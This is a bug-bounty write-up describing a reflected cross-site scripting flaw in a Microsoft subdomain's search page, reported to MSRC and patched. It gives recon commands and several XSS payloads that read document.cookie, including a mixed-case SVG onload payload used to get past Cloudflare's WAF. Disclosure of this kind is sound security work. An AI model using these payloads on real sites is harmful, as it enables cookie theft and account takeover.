Cloudflare Bypass leads to RXSS[Reflected-Cross Site Scripting] in Microsoft

Prince Roy(RoyzSec)
4 min readNov 9, 2023

--

Har Har Mahadevđź”±. This is Prince Roy, a security researcher, also known as royzsec. Back with another write-up about my latest finding[Cross Site Scripting] at Microsoft domain by bypassing Cloudflare. Are you curious about the whole process and my mindset for finding?

So let’s start! As usual, I use a subfinder to collect subdomains. But this time I collected subdomains from https://chaos.projectdiscovery.io/, where you can easily get updated domains. Actually, they update their list every day.

Then by HTTPX, I checked and gathered all live domains.

cat microsoftdomains.txt | httpx -mc 200 | tee microsoftlivedomains.txt

Then one by one I checked every domain. I guess in the fourth or fifth domain I found this vulnerability. Actually, that domain's search functionality was vulnerable. So normally I search “Hello”.

Then I saw page view-source because if we just put payload it won’t work because without knowing the functionality, just putting payload will not work and Microsoft domains are using Cloudflare and cdnjs CDN [Content delivery network]

Source code of search function

<div class="search">

<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for Hello">Hello</h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>1 result</div>
</div>

So here, “Hello” was closing via <h> tag and there was no filtration to filter the search input. Then I tried with closing </h1> and normal payloads.

</h1><script>alert(document.cookie)</script>
</h1><img src=x onerror=confirm(document.cookie)>

but both times Cloudflare blocked me.

Then I tried my Brahmastra:

FUZZ</h1><Svg Only=1 OnLoad=confirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgUm95elNlYw=="))>

Because of the maximum time, this payload helped me to bypass the WAF or Cloudflare in the past. When I tried this, then guess what!!

Boom!! code was injected successfully and popped up on the screen. Source code:

<div class="search">

<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for Hello</h1><Svg Only=1 OnLoad=confirm(document.cookie)>">Hello</h1><Svg Only=1 OnLoad=confirm(document.cookie)></h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>0 result</div>
</div>

By closing </h1> it helped to inject and the small and capital characters helped to bypass the firewall. Literally, I was like

After I reported it quickly and the next day, the MSRC team accepted this as a valid issue.

And they patched within one day. Again I tried to bypass this but this function is now pretty safe.

Developed code:

<div class="search">

<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for hello"Svg Only=1 OnLoad=confirmatob"Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="">hello"Svg Only=1 OnLoad=confirmatob"Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="</h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>0 result</div>
</div>

Priority: P2

Severity: Important

POC:

Impact:

  1. As an attacker, I can use this attack to steal the cookie of the victim which leads to ATO[Account take over]
  2. Disclosure of end user files, redirecting the user to some other page or site, or modifying presentation of content.

Hall Of Fame:

Finally, thanks for reading my small blog if you like this please share it with your friends and press the clap button for me which inspires me a lot.

Please follow my social media platforms:

Linkedin: https://www.linkedin.com/in/prince-roy-4b9a75187/

Github: https://github.com/royzsec

Twitter: https://twitter.com/royzsec

--

--